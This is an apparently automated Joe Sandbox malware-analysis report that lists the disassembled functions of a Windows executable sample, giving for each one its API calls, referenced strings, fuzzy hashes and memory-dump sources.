Opcode Fuzzy Hash: da92b485cce2626ab64eabfa64daaed038194f15287f05380521b28832e8ebf0
Instruction Fuzzy Hash: DFB16E70A00105EFCB14DF55C890EEAB7B9EF58344F14C46AF949AB291EB38E941CB99

Function 0046AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

__wcsnicmp.LIBCMT ref: 0046B02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0046B0F6

Strings

LPT, xrefs: 0046B027

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 22386211fa87ba6f25b54d14b3f4bab1e3a1f04917f9a9de026b4ee2e74de440
Instruction ID: 83c5630e61c03cc96fa61f6b78faa4233f6e1162f12f5b466cba6b991e1c6364
Opcode Fuzzy Hash: 22386211fa87ba6f25b54d14b3f4bab1e3a1f04917f9a9de026b4ee2e74de440
Instruction Fuzzy Hash: EF617475A00215AFCB14DF54C851EEEB7B4EF09350F10806AF916EB391E738AE85CB99

Function 00412957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00412968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00412981

Strings

@, xrefs: 00412975

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
Instruction ID: a5a81f9d260a569e77baff687d6fe7a0f73e349ca0d117409dcb6840122a66be
Opcode Fuzzy Hash: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
Instruction Fuzzy Hash: CB5159B24187449BD320EF15D885BAFBBE8FB85344F41886DF2D8911A1DB74892CCB5A

Function 00469734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00404F0B: __fread_nolock.LIBCMT ref: 00404F29

_wcscmp.LIBCMT ref: 00469824
_wcscmp.LIBCMT ref: 00469837

Strings

FILE, xrefs: 00469770

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 61b9d9cc128ec34272c66af4fd2f1fdd343520f55c014a8993afaf0baf9333d9
Instruction ID: cde52b3ca8712c625de002da450250744642bb9d8a04c3b997614ed6dba67ccd
Opcode Fuzzy Hash: 61b9d9cc128ec34272c66af4fd2f1fdd343520f55c014a8993afaf0baf9333d9
Instruction Fuzzy Hash: 8C41A771A0021ABADF20AAA5CC45FEF77BDDF85714F00047EB604B7181DA79AD058B69

Function 00440574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0044057F

Strings

DdL, xrefs: 0040A317
DdL, xrefs: 0040A151

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ClearVariant
String ID: DdL$DdL
API String ID: 1473721057-91670653
Opcode ID: c0a4b12d34a2949c4f0399b8a32a882820cb71d7b6b526698ba9514fc12a179e
Instruction ID: 8cf85b897da21b35b232154f37a53a393289a03a8f02d27ab87a98346ee69310
Opcode Fuzzy Hash: c0a4b12d34a2949c4f0399b8a32a882820cb71d7b6b526698ba9514fc12a179e
Instruction Fuzzy Hash: 5D5113B86043019FD754DF18C580A1ABBF1BF99344F54886EE9859B3A1D339EC91CF4A

Function 0047258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0047259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004725D4

Strings

|, xrefs: 004725A5

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 57f61fd01a308bda18669db1d90637b579712718f35f37a6001f1c43c21cdce8
Instruction ID: 4adfb47e446f893ace23fd506e663b8e952a67a31115c745ae406753cf5a670a
Opcode Fuzzy Hash: 57f61fd01a308bda18669db1d90637b579712718f35f37a6001f1c43c21cdce8
Instruction Fuzzy Hash: A5313871D00119ABCF11AFA1CC85EEEBFB8FF08344F10406AF918B6162DB756916DB65

Function 00486A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00486B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00486B53

Strings

static, xrefs: 00486AB3

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
Instruction ID: c0acac3fdbca48a843832e92e86f2a53b54dc7fac4935119c3a772658612a1a1
Opcode Fuzzy Hash: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
Instruction Fuzzy Hash: B3318171100604AEDB10AF69CC41BFF73A9FF48754F11892EF9A5D7290DA34AC81CB68

Function 004628A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00462911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046294C

Strings

0, xrefs: 0046290A

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 96bee15b93cabbe7b730b6a832175a1ae6e783472d86f40c3c4e5f0907898536
Instruction ID: 2b4b8058b7b01795732b14ccdc08f7f24d6d082f06cc36c2997a609d376c2748
Opcode Fuzzy Hash: 96bee15b93cabbe7b730b6a832175a1ae6e783472d86f40c3c4e5f0907898536
Instruction Fuzzy Hash: BE31D871700705BBDB24DE48CE45BAFBBA4EF85350F14001AE881A6291E7B89948CB1B

Function 004866D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00486761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0048676C

Strings

Combobox, xrefs: 0048672E

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
Instruction ID: 7937b7f8ceb80f7c2640562fc72fb2af059ad44b1fd006181b112b31544ba688
Opcode Fuzzy Hash: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
Instruction Fuzzy Hash: 9111B271200208AFEF51AF54DC81EAF376AEB48368F21092AF91897390D6399C5197A8

Function 00486C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91

GetWindowRect.USER32(00000000,?), ref: 00486C71
GetSysColor.USER32(00000012), ref: 00486C8B

Strings

static, xrefs: 00486C4E

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
Instruction ID: 619ac3c59cbe9074ca3f8c975c7c8c691f8bfa66afa20d6a6bf36cd90ef0372b
Opcode Fuzzy Hash: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
Instruction Fuzzy Hash: DC212CB2510209AFDF04EFA8CC45EEE7BA8FB08315F114A29FD55D2250D639E851DB64

Function 00486920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 004869A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004869B1

Strings

edit, xrefs: 00486986

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
Instruction ID: c4dc0b7ee3ea423f7e1eb401844c401eee0777dcbcb5b463cc5485c74a1bef4f
Opcode Fuzzy Hash: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
Instruction Fuzzy Hash: A711B2B1100104ABEF506F68DC40EEF3769EB05378F614B29F964972E0C739DC919758

Function 004629AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00462A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00462A41

Strings

0, xrefs: 00462A18

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
Instruction ID: fa89ad59b694463807a05e008f151e0ce3f2ba89f6cc59c0a4ca2f54b8788f6f
Opcode Fuzzy Hash: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
Instruction Fuzzy Hash: EA11B172A01915BACB30DA98DA44BDF73A8AB45304F044027E855B7290E7F8AD0AC79A

Function 004721D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0047222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472255

Strings

<local>, xrefs: 0047221D

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
Instruction ID: 87a968fd796eb7ebd351e14a87864fbf4782faaabfad8c695b3487e96fec79d3
Opcode Fuzzy Hash: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
Instruction Fuzzy Hash: 2C113270101221BADB248F118D84EFBFBACFF0A351F10C66BF90892200D2B49881D6F9

Function 0041092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

_wcscat.LIBCMT ref: 00444CB7

Strings

SL, xrefs: 004109AE

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: SL
API String ID: 257928180-181245872
Opcode ID: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
Instruction ID: 43824745660c3988bd5ee8fabd2b32f2c8f8042702d18c831ff1fab54f9b3e1b
Opcode Fuzzy Hash: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
Instruction Fuzzy Hash: ED118274A15208AACB40EB648945FDD77B8AF08354B0044ABB948E7291EAB8B6C4471D

Function 00458E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00458E73

Strings

ListBox, xrefs: 00458E3D
ComboBox, xrefs: 00458E12

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 9946c7197ab10ad9fde50dae1b7c0277909534bd518ba67c60e97b676ced7028
Instruction ID: b8e2c670fbb7cccfe9550cd9997642be974785ccb83f9afd7f496d9e06e76b61
Opcode Fuzzy Hash: 9946c7197ab10ad9fde50dae1b7c0277909534bd518ba67c60e97b676ced7028
Instruction Fuzzy Hash: 4001F971601118ABCF14FBA1CC429FE7368EF01320B100A2FBC25772D2DE39580CC655

Function 00468D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00468DAC
__fread_nolock.LIBCMT ref: 00468DC1

Strings

EA06, xrefs: 00468DF3

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 52e4c11e8ef934338f3706a5bab433cb38c03b7aa91e080fe40e6f8015fadc0b
Instruction ID: 3cd15271acb3b06ac884f373c06a49f445b450121f82016c471601618c020999
Opcode Fuzzy Hash: 52e4c11e8ef934338f3706a5bab433cb38c03b7aa91e080fe40e6f8015fadc0b
Instruction Fuzzy Hash: 8F01F9719042287EDB18CAA9D816EFE7BFCDB11301F00459FF552D2181E878E6048764

Function 00458CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00458D6B

Strings

ListBox, xrefs: 00458D35
ComboBox, xrefs: 00458D0A

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: d0242bd35a47d84e43d9a51d6d7b20f2831aa5b35d47bc754fff3bab3a4422aa
Instruction ID: f717951ca8db0a39ae808ededaa33f35f94e61068a96ac8ac9a889606be0a7e6
Opcode Fuzzy Hash: d0242bd35a47d84e43d9a51d6d7b20f2831aa5b35d47bc754fff3bab3a4422aa
Instruction Fuzzy Hash: 1701B1B1A41108ABCF14EBA1C952AFF73A8DF15341F10042FB805772D2DE285E0CD67A

Function 00458D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00458DEE

Strings

ListBox, xrefs: 00458DBA
ComboBox, xrefs: 00458D8F

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
